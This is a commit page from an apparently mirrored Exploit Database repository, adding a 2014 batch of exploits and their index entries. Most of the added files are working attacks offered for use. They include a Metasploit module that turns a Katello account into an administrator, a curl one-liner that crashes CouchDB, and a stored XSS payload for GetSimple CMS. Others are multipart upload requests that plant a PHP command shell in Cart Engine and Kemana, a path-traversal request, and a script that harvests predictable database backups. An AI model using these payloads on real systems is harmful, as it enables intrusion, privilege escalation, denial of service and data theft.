bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_27_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-27 04:31:46 +00:00
parent 06a026f6dd
commit ee58fa916e
30 changed files with 2497 additions and 40 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
files.csv
View file

@ -21086,7 +21086,7 @@ id,file,description,date,author,platform,type,port
23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0
23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0
23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0
23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0
23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0
23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0
23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability",2004-03-31,http-equiv,windows,remote,0
23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0
@ -29263,3 +29263,31 @@ id,file,description,date,author,platform,type,port
32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0
32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0
32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0
32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0
32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0
32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0
32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0
32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0
32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443
32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0
32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0
32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0
32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0
32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 'api.php' URI Redirection Vulnerability",2008-10-23,xuanmumu,php,webapps,0
32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 'announcements.php' SQL Injection Vulnerability",2008-10-23,xuanmumu,php,webapps,0
32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 'liste' Parameter Cross Site Scripting Vulnerability",2008-10-23,"Omer Singer",php,webapps,0
32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0

Can't render this file because it is too large.

147
platforms/linux/remote/32515.rb Executable file
View file

@ -0,0 +1,147 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',
'Description' => %q{
This module exploits a missing authorization vulnerability in the
"update_roles" action of "users" controller of Katello and Red Hat Satellite
(Katello 1.5.0-14 and earlier) by changing the specified account to an
administrator account.
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2143'],
['CWE', '862']
],
'DisclosureDate' => 'Mar 24 2014'
)
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end
def run
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),
'vars_get' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Authentication failed')
return
else
session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
if session.nil?
print_error('Failed to retrieve the current session')
return
end
end
print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_katello_session=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'dashboard')
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Authentication failed')
return
else
session = $1 if res.get_cookies =~ /_katello_session=(\S*);/
if session.nil?
print_error('Failed to retrieve the current session')
return
end
end
if res.headers['Location'] =~ /user_session\/new$/
print_error('Failed to retrieve the user id')
return
else
csrf_token = $1 if res.body =~ /<meta[ ]+content="(\S*)"[ ]+name="csrf-token"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(\S*)"[ ]*\/?>/i if csrf_token.nil?
if csrf_token.nil?
print_error('Failed to retrieve the CSRF token')
return
end
user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/
if user.nil?
print_error('Failed to retrieve the user id')
return
end
end
print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")
res = send_request_cgi(
'cookie' => "_katello_session=#{session}",
'headers' => {
'X-CSRF-Token' => csrf_token
},
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),
'vars_post' => {
'user[role_ids][]' => '1'
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.headers['X-Message-Type'] =~ /success$/
print_good('User updated successfully')
else
print_error('Failed to update user')
end
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end

16
platforms/multiple/dos/32519.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0
HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999
TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.

15
platforms/multiple/local/32501.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/31853/info
MIFARE Classic is prone to multiple security weaknesses:
1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register.
2. A security weakness may allow attackers to recover the previous state of the linear feedback shift register.
3. A security weakness may allow attackers to invert the filter function and potentially gain access to the private key.
4. A security weakness may allow attackers to reduce the search space for tag nonces.
Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions.
http://www.exploit-db.com/sploits/32501.tgz

56
platforms/php/webapps/32502.txt Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: etSimple CMS v3.3.1 Persistent Cross Site Scripting
# Google Dork: N/A
# Date: 24-03-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://get-simple.info/
# Software Link: http://get-simple.info/download/
# Version: v3.3.1
# Tested on: N/A
# CVE : N/A
#
## Description:
#
# In the administrative interface, the users can change their personal
settings. The parameters "name" and
# "permalink" do not properly sanitize its input and allows malicious code
to be stored in the XML file.
#
## PoC:
# Admin"><script>alert("1");</script>
# http://url/admin/settings.php
#
#
# The following parameters are vulnerable:
#
# 1. Permalink
# 2. Name
#
#
# More information can be found at:
http://www.nerdbox.it/getsimple-cms-v3-3-1-vulnerabilities/

350
platforms/php/webapps/32503.txt Executable file
View file

@ -0,0 +1,350 @@
?
Cart Engine 3.0.0 Remote Code Execution
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 3.0.0
Summary: Open your own online shop today with Cart Engine! The
small, yet powerful and don't forget, FREE shopping cart based
on PHP & MySQL. Unique features of Cart Engine include: CMS engine
based on our qEngine, product options, custom fields, digital
products, search engine friendly URL, user friendly administration
control panel, easy to use custom fields, module expandable, sub
products, unsurpassed flexibility...and more!
Desc: Cart Engine suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:
User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)
Only the 'Super Admin' level makes the Tool 'File Manager' available.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5182
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5182.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
#1 (Modules > qBanner > Manage Banner > Add Entry)
POST http://localhost/ce3_0/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"
QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"
This page is part of qBanner module. Please use qBanner Manager to edit this page.
-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"
-----------------------------225222869427624--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
#2 (Tools > File Manager > Upload)
POST http://localhost/ce3_0/admin/fman/upload_process.php HTTP/1.1
-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"
-----------------------------76802486520945
Content-Disposition: form-data; name="n"
5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945--
Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/ce3_0/shell.php?cmd=whoami
#3 (Modules > Slideshow > Manage Slides > Add Entry)
POST http://localhost/ce3_0/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1
-----------------------------23201806221528
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------23201806221528
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------23201806221528
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------23201806221528
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------23201806221528
Content-Disposition: form-data; name="group_id"
SSHOW
-----------------------------23201806221528
Content-Disposition: form-data; name="page_body"
This page is part of SlideShow module. Please use SlideShow Manager to edit this page.
-----------------------------23201806221528
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------23201806221528
Content-Disposition: form-data; name="page_list"
-----------------------------23201806221528--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
#4 (Contents > Manage Categories > Add Entry)
POST http://localhost/ce3_0/admin/page_cat.php? HTTP/1.1
-----------------------------205172563220150
Content-Disposition: form-data; name="AXSRF_token"
3afa0c7483889ac54d7b6afa4083a9a2
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------205172563220150
Content-Disposition: form-data; name="group_id"
GENPG
-----------------------------205172563220150
Content-Disposition: form-data; name="parent_id"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------205172563220150
Content-Disposition: form-data; name="permalink"
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_details"
<p>Zero Science Lab</p>
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------205172563220150--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami
#5 (Products > Category > Add Entry)
POST http://localhost/ce3_0/admin/product_cat.php? HTTP/1.1
-----------------------------137423069119287
Content-Disposition: form-data; name="AXSRF_token"
c3d8ccc82a75bb49d7698b6ed27fd016
-----------------------------137423069119287
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------137423069119287
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------137423069119287
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------137423069119287
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------137423069119287
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------137423069119287
Content-Disposition: form-data; name="parent_id"
1
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------137423069119287
Content-Disposition: form-data; name="permalink"
zsl
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_details"
<p>CategoryDesc</p>
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_keywords"
Zero Science Lab
-----------------------------137423069119287
Content-Disposition: form-data; name="cat_featured"
-----------------------------137423069119287--
Upload location: http://localhost/ce3_0/public/image/
Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami

49
platforms/php/webapps/32504.txt Executable file
View file

@ -0,0 +1,49 @@
?
Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 3.0.0
Summary: Open your own online shop today with Cart Engine! The
small, yet powerful and don't forget, FREE shopping cart based
on PHP & MySQL. Unique features of Cart Engine include: CMS engine
based on our qEngine, product options, custom fields, digital
products, search engine friendly URL, user friendly administration
control panel, easy to use custom fields, module expandable, sub
products, unsurpassed flexibility...and more!
Desc: Cart Engine suffers from an authenticated file inclusion
vulnerability (LFI) when input passed thru the 'run' parameter to
task.php is not properly verified before being used to include files.
This can be exploited to include files from local resources with
directory traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5181
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5181.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/ce3_0/admin/task.php?run=../../../../../../windows/win.ini

179
platforms/php/webapps/32505.txt Executable file
View file

@ -0,0 +1,179 @@
?<?php
/*
Cart Engine 3.0.0 Database Backup Disclosure Exploit
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 3.0.0
Summary: Open your own online shop today with Cart Engine! The
small, yet powerful and don't forget, FREE shopping cart based
on PHP & MySQL. Unique features of Cart Engine include: CMS engine
based on our qEngine, product options, custom fields, digital
products, search engine friendly URL, user friendly administration
control panel, easy to use custom fields, module expandable, sub
products, unsurpassed flexibility...and more!
Desc: Cart Engine stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as 'Full Backup YYYYMMDD.sql' or 'Full Backup YYYYMMDD.gz', which
can be exploited to disclose sensitive information by downloading
the file. The '/admin/backup' is also vulnerable to directory listing
by default.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5180
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5180.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
*/
error_reporting(0);
function status($done, $total, $size=20)
{
static $start_time;
if($done > $total) return;
if(empty($start_time)) $start_time=time();
$now = time();
$perc=(double)($done/$total);
$bar=floor($perc*$size);
$disp=number_format($perc*100, 0);
$status_bar="\r $disp% [";
$status_bar.=str_repeat("=", $bar);
if($bar<$size)
{
$status_bar.=">";
$status_bar.=str_repeat(" ", $size-$bar);
} else
{
$status_bar.="=";
}
$status_bar.="] $done/$total";
$rate = ($now-$start_time)/$done;
$left = $total - $done;
$eta = round($rate * $left, 2);
$elapsed = $now - $start_time;
$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
echo "$status_bar ";
flush();
if($done == $total)
{
echo "\n";
}
}
print "
@---------------------------------------------------------------@
| |
| Cart Engine 3.0.0 Database Backup Disclosure Exploit |
| |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
| Advisory ID: ZSL-2014-5180 |
| www.zeroscience.mk |
| |
@---------------------------------------------------------------@
";
if ($argc < 4)
{
print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
die();
}
$godina_array = array('2014','2013','2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";
$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";
echo "\n [*] Running checks:\n\n";
foreach($godina_array as $godina)
{
foreach($mesec_array as $mesec)
{
$x++;
status($x, 58);
foreach($dn_array as $dn)
{
$ext=".gz";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
$ext=".sql";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
}
}
}
print "\n\n [*] Zero findings!\n\n\n";
?>

53
platforms/php/webapps/32506.txt Executable file
View file

@ -0,0 +1,53 @@
?
Kemana Directory 1.5.6 kemana_admin_passwd Cookie User Password Hash Disclosure
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana contains a flaw that is due to the 'kemana_admin_passwd'
cookie storing user password SHA1 hashes. This may allow a remote MitM
attacker to more easily gain access to password information.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5179
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5179.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
GET /kemana/admin/rev_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/kemana/admin/link.php
Cookie: qvc_value=4e520fb7e28ff76d71800f4329633bc12040101c; kemana_user_id=guest%2Acbb77d83775796bc42f94a97f9905a0d; kemana_admin_id=admin; kemana_admin_passwd=d033e22ae348aeb5660fc2140aec35850c4da997
Connection: keep-alive

261
platforms/php/webapps/32507.txt Executable file
View file

@ -0,0 +1,261 @@
?
Kemana Directory 1.5.6 Remote Code Execution
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana Directory suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:
User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)
Only the 'Super Admin' level makes the Tool 'File Manager' available.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5178
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5178.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
#1 (Modules > Articles > Manage Categories > Create A New Category)
POST http://localhost/kemana/admin/task.php?mod=portal&run=pcat_edit.php& HTTP/1.1
-----------------------------18727540915953
Content-Disposition: form-data; name="AXSRF_token"
12adff6127dfa3355ac24bad4a4c8687
-----------------------------18727540915953
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------18727540915953
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------18727540915953
Content-Disposition: form-data; name="primary_key"
cat_id
-----------------------------18727540915953
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------18727540915953
Content-Disposition: form-data; name="parent"
0
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_note"
nothing to note
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_keywords"
Zero Science Lab
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_img"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------18727540915953--
Upload location: http://localhost/kemana/public/image/
Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
#2 (Modules > qBanner > Manage Banner > Add Entry)
POST http://localhost/kemana/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"
QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"
This page is part of qBanner module. Please use qBanner Manager to edit this page.
